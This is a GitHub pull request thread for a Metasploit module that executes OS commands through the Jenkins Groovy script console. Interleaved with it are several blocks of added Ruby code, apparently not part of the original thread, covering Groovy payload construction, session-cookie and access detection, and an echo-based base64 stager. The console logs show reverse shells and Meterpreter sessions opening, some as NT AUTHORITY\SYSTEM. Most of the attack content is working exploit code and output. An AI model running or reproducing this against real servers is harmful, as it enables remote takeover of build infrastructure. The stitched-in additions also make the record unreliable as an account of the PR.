add module to execute commands via Jenkins Script Console #1338

Merged

Conversation

zeroSteiner
Contributor

This pull request introduces a module to execute OS commands via the Groovy script console of the Jenkins continuous integration server. It's been tested on Windows as well as Ubuntu on versions 1.496 and 1.499 (latest).

Jenkins can be found here: http://jenkins-ci.org/

Ubuntu output

msf (S:4 J:0)  exploit(jenkins_script_console) > exploit

[*] Started bind handler
[*] Checking access to the script console
[*] Logging in...
[*] 172.20.220.117:8080 - Sending payload...
[*] Command shell session 10 opened (172.20.220.153:39165 -> 172.20.220.117:4444) at 2013-01-18 14:31:02 -0500

id
uid=999(tomcat) gid=999(tomcat) groups=999(tomcat)

Windows output

msf (S:4 J:0)  exploit(jenkins_script_console) > exploit

[*] Started reverse handler on 192.168.90.1:4444 
[*] Checking access to the script console
[*] Logging in...
[*] 192.168.90.145:8080 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
...
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (752128 bytes) to 192.168.90.145
[*] Meterpreter session 11 opened (192.168.90.1:4444 -> 192.168.90.145:4390) at 2013-01-18 15:12:36 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
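
The mechanism the module relies on, as an added example (not the module's code and not from the PR): the Jenkins script console runs whatever Groovy is posted to it, so an OS command becomes a Groovy `execute()` call whose output is printed back into the HTML response. The assumptions here are mine: the console takes the Groovy in a `script` form field at `<TARGETURI>script`, the output is HTML-escaped on the page, and the output is bracketed with a random marker so it can be cut back out of the response; the platform wrappers (`cmd.exe /c`, `/bin/sh -c`) are my choice.

```ruby
# Added example, not the Metasploit module's code: build the Groovy that the
# Jenkins script console runs to execute an OS command, and the form body
# that carries it. Assumptions (mine): the console reads a "script" form
# field, output comes back HTML-escaped, and we wrap the output in a marker
# so it can be extracted from the page.
require 'uri'
require 'cgi'
require 'securerandom'

module JenkinsScriptConsole
  # Quote a string as a single-quoted Groovy literal (no $ interpolation,
  # so only backslash, quote and newline need escaping).
  def self.groovy_str(s)
    "'" + s.gsub(/[\\']/) { |c| "\\#{c}" }.gsub("\n", '\n') + "'"
  end

  # Groovy that runs +cmd+ through the platform shell and prints stdout and
  # stderr between two copies of +marker+.
  def self.groovy_for(cmd, platform, marker)
    argv = case platform
           when :windows then ['cmd.exe', '/c', cmd]
           when :unix    then ['/bin/sh', '-c', cmd]
           else raise ArgumentError, "unknown platform #{platform.inspect}"
           end
    list = argv.map { |a| groovy_str(a) }.join(', ')
    <<~GROOVY
      def out = new StringBuffer()
      def err = new StringBuffer()
      def proc = [#{list}].execute()
      proc.waitForProcessOutput(out, err)
      println('#{marker}')
      print(out.toString() + err.toString())
      println('#{marker}')
    GROOVY
  end

  # Console path relative to the configured Jenkins path (TARGETURI).
  def self.console_path(targeturi)
    targeturi.end_with?('/') ? "#{targeturi}script" : "#{targeturi}/script"
  end

  # application/x-www-form-urlencoded body for the console's form.
  def self.request_body(cmd, platform, marker)
    URI.encode_www_form('script' => groovy_for(cmd, platform, marker))
  end

  # Cut the command output back out of the console's HTML response and undo
  # the HTML escaping. Returns nil when the marker pair is not present, which
  # usually means the script did not run (login page, 403, Groovy error).
  def self.extract_output(html, marker)
    m = Regexp.escape(marker)
    found = html.match(/#{m}\r?\n(.*?)#{m}/m)
    found && CGI.unescapeHTML(found[1])
  end

  # One request's worth of parameters for a command, with a fresh marker.
  def self.build(cmd, platform, targeturi: '/')
    marker = SecureRandom.hex(8)
    { method: 'POST', path: console_path(targeturi),
      body: request_body(cmd, platform, marker), marker: marker }
  end
end
```

A caller POSTs `build(...)[:body]` to `build(...)[:path]` (with the session cookie if a login was needed) and feeds the response body plus the marker to `extract_output`; a nil result means the console did not execute the script rather than that the command produced no output.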

'jamcut'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
Contributor

The Version field isn't needed anymore (svn related)

@jvazquez-r7
Contributor

The exploit doesn't work for me when using an empty username and password. I think the exploit should allow it, because the Windows package doesn't have security enabled by default, so no username and password are needed by default to access the script console:

msf  exploit(jenkins_script_console) > show options
Module options (exploit/multi/http/jenkins_script_console):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /                yes       The path to jenkins
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.147    yes       The target address
   RPORT     8080             yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows
msf  exploit(jenkins_script_console) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] Checking access to the script console
[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass


when 'unix'
print_status("#{rhost}:#{rport} - Sending payload...")
http_send_command("#{payload.encoded}")
Contributor

In "struts_code_exec.rb" there is a nice Linux stager written by bannedit, I guess; not sure if you tried whether it could work in this case.

@zeroSteiner
Contributor Author

The issue was that the JSESSIONID= was not matching the cookie when Jenkins was installed from the original site (as opposed to Bitnami), which included additional information like JSESSIONID.24e25ab7.

The module will still detect and handle whether logging in is required, and seems to be working as expected in either case.

Thanks for the help testing jvazquez.
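
The two pieces of that fix, as an added example (not the module's code): match the session cookie whether the container names it `JSESSIONID` or `JSESSIONID.<suffix>`, and return nil instead of crashing when no cookie was set, which is what the `undefined method 'split' for nil` above came from. The access check is my own classification and rests on assumptions: an unauthenticated GET of the console returns the page containing its `name="script"` textarea, a secured Jenkins either redirects to `/login` or serves the `j_username` form inline, and a logged-in user without console rights gets a 403.

```ruby
# Added example, not the module's code: read the session cookie Jenkins sets
# and decide whether the script console is reachable without logging in.
# Assumptions (mine): the console page contains name="script", a login
# redirect goes to /login, the inline login form uses j_username, and the
# cookie name may carry a suffix (JSESSIONID.24e25ab7) as seen with the
# jenkins-ci.org package.
module JenkinsConsoleAccess
  # Match JSESSIONID with an optional ".<suffix>" so either cookie name works.
  SESSION_COOKIE = /\b(JSESSIONID(?:\.[0-9A-Za-z]+)?)=([^;,\s]+)/

  # Returns "name=value" ready for a Cookie: header, or nil when no session
  # cookie was set, so the caller can branch instead of calling methods on nil.
  # Accepts one Set-Cookie value or an array of them.
  def self.session_cookie(set_cookie)
    Array(set_cookie).each do |hdr|
      m = SESSION_COOKIE.match(hdr.to_s)
      return "#{m[1]}=#{m[2]}" if m
    end
    nil
  end

  # Classify the response to GET <TARGETURI>script. headers uses lowercase
  # keys. Returns :open, :login_required, :forbidden or :unknown.
  def self.classify(status, headers, body)
    location = headers.fetch('location', '').to_s
    if status == 200 && body.include?('name="script"')
      :open
    elsif (300..399).cover?(status) && location.include?('/login')
      :login_required
    elsif status == 200 && body.include?('j_username')
      :login_required
    elsif status == 403
      :forbidden
    else
      :unknown
    end
  end

  # Next step for the exploit flow: send the script straight away, log in
  # first, or give up. A nil cookie is fine when no login is needed.
  def self.plan(status, headers, body)
    access = classify(status, headers, body)
    cookie = session_cookie(headers['set-cookie'])
    case access
    when :open           then { action: :send_script, cookie: cookie }
    when :login_required then { action: :login, cookie: cookie }
    else                      { action: :abort, reason: access }
    end
  end
end
```

When the plan is `:login`, the cookie returned here is the one to send with the login POST and then replace with whatever Set-Cookie the login response returns; the suffix-tolerant regex handles both.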

@jvazquez-r7
Contributor

Tested; working better now on Windows:

msf > use exploit/multi/http/jenkins_script_console 
msf  exploit(jenkins_script_console) > set rhost 192.168.1.147
rhost => 192.168.1.147
msf  exploit(jenkins_script_console) > set rport 8080
rport => 8080
msf  exploit(jenkins_script_console) > show options
Module options (exploit/multi/http/jenkins_script_console):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password for the specified username
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.147    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /jenkins/        yes       The path to jenkins
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Windows
msf  exploit(jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf  exploit(jenkins_script_console) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.1.147:8080 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
...
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:1938) at 2013-01-20 02:39:09 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.147 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(jenkins_script_console) > 

Since there isn't a response about the Linux stager comment, I'll do a little testing around it tomorrow :) Hopefully we'll be able to close it soon! :D Thanks @zeroSteiner!!

@jvazquez-r7
Contributor

Hi @zeroSteiner,

I've added a new target for Linux staging so native Meterpreter can be executed. The Unix CMD target remains because it's always useful: CMD payloads are fine, and the staging can fail on some targets!

If you agree with the code, please land this pull request into your branch (zeroSteiner#1), and this pull request will be automatically updated!

  • Staging working
msf  exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password for the specified username
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.154    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /                yes       The path to jenkins
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         192.168.1.128    yes       The listen address
   LPORT         4444             yes       The listen port
   PrependFork                    no        Add a fork() / exit_group() (for parent) code


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf  exploit(jenkins_script_console) > reload
[*] Reloading module...
msf  exploit(jenkins_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.1.154:8080 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.154
[*] Meterpreter session 12 opened (192.168.1.128:4444 -> 192.168.1.154:46726) at 2013-01-20 13:37:06 +0100
[!] Deleting /tmp/IVVrDu payload file

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.154 - Meterpreter session 12 closed.  Reason: User exit

  • CMD payload too:
msf  exploit(jenkins_script_console) > set target 2
target => 2
msf  exploit(jenkins_script_console) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf  exploit(jenkins_script_console) > rexploit
[*] Reloading module...

[*] Checking access to the script console
[*] Started reverse double handler
[*] No authentication required, skipping login...
[*] 192.168.1.154:8080 - Sending payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xKrJSZPrjD3TsbcS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "xKrJSZPrjD3TsbcS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 13 opened (192.168.1.128:4444 -> 192.168.1.154:46728) at 2013-01-20 13:37:30 +0100

id
uid=116(jenkins) gid=65534(nogroup) groups=65534(nogroup)
^C
Abort session 13? [y/N]  y

[*] 192.168.1.154 - Command shell session 13 closed.  Reason: User exit
msf  exploit(jenkins_script_console) > 
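
What the "Command Stager progress" lines in the Windows runs above and the Linux stager here have in common, as an added example (not Metasploit's Rex command stager and not from the PR): a command-execution primitive can only run short command lines, so a native payload is base64-encoded, cut into pieces that fit one line, appended on the target with one echo per piece, and decoded by a final command. The decode commands are my assumptions (`certutil -decode` on Windows, `base64 -d` on unix); the PR's Windows stager drops its own VBS decoder instead, and a missing decoder is one reason the staging can fail where a plain CMD payload still works.

```ruby
# Added example, not Metasploit's command stager: echo-based transfer of a
# binary payload over a command-execution primitive. Assumptions (mine):
# the decode step is certutil on Windows and base64 -d on unix, and 2048
# characters per echo, matching the 2048-byte steps in the PR's log.
require 'base64'

module EchoStager
  CHUNK = 2048

  # Base64 of the payload, cut into pieces of at most +size+ characters.
  def self.chunks(payload, size = CHUNK)
    Base64.strict_encode64(payload).scan(/.{1,#{size}}/)
  end

  # Progress string in the same shape as the log: "  2.01% done (2048/101881 bytes)".
  def self.progress(done, total)
    format('%6.2f%% done (%d/%d bytes)', done * 100.0 / total, done, total)
  end

  # Final command that turns the appended base64 file back into the binary
  # and runs it. Decoder choice is an assumption for the example.
  def self.decode_command(platform, file)
    case platform
    when :windows then "certutil -decode #{file}.b64 #{file}.exe && start #{file}.exe"
    when :unix    then "base64 -d #{file}.b64 > #{file} && chmod +x #{file} && #{file}"
    else raise ArgumentError, "unknown platform #{platform.inspect}"
    end
  end

  # All commands to send, in order, plus the progress lines a caller would
  # print after each one. Base64 alphabet needs no quoting in cmd.exe or sh.
  def self.transfer(payload, platform, file)
    pieces = chunks(payload)
    total = pieces.sum(&:length)
    done = 0
    cmds = []
    log = []
    pieces.each do |piece|
      cmds << "echo #{piece}>>#{file}.b64"
      done += piece.length
      log << "Command Stager progress - #{progress(done, total)}"
    end
    cmds << decode_command(platform, file)
    { commands: cmds, log: log }
  end

  # Apply the echo commands to an in-memory file and decode, to check that
  # the transfer reassembles the original bytes before using it for real.
  def self.replay(cmds)
    b64 = cmds.map { |c| c[/\Aecho ([A-Za-z0-9+\/=]+)>>/, 1] }.compact.join
    Base64.strict_decode64(b64)
  end
end
```

`replay` is the offline check: if it does not return the original bytes, the chunking or quoting is wrong before a single command reaches the target. The real stagers also delete the `.b64` file and the decoded binary afterwards, as the `Deleting /tmp/... payload file` line above shows.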

@zeroSteiner
Contributor Author

msf (S:0 J:0)  exploit(jenkins_script_console) > exploit

[*] Started reverse handler on 192.168.90.1:4444 
[*] Checking access to the script console
[*] Logging in...
[*] 192.168.90.182:80 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.90.182
[*] Meterpreter session 1 opened (192.168.90.1:4444 -> 192.168.90.182:34657) at 2013-01-20 13:01:05 -0500
[!] Deleting /tmp/GzSwS payload file

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999, suid=999, sgid=999
meterpreter > sysinfo 
Computer     : linux
OS           : Linux linux 3.2.0-31-virtual #50-Ubuntu SMP Fri Sep 7 16:36:36 UTC 2012 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > 

I like it. Before I spoke to #metasploit on IRC I was hoping to add this in with the features of #1275, but since mixins can't be used based on the platform, this will work.

@jvazquez-r7
Contributor

Awesome! :)

merging!

@jvazquez-r7 jvazquez-r7 merged commit ae247c1 into rapid7:master Jan 20, 2013